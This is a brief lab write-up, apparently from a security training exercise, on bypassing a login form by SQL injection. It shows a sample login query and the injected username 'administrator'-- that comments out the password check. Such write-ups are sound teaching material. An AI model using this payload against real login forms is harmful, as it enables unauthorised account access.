SQL Injection Login Bypass

2023/07/22 1:44PM

Description

This lab contains a SQL injection vulnerability in the login function. To solve the lab, perform a SQL injection attack that logs in to the application as the administrator user.

Getting Started

Once the lab is loaded we are greeted with a shopping website.

The website has some login functionality. To solve the lab we need to perform SQL injection to login as administrator, so lets focus on the login functionality.

A common SQL query for websites to use is the following:

SELECT * FROM users WHERE username = 'administrator' AND password = 'shelled123!'

SQL Injection Login Bypass

To login as the administrator we can comment out the "AND password = 'shelled123!'" part.

SELECT * FROM users WHERE username = 'administrator'-- AND password = 'shelled123!'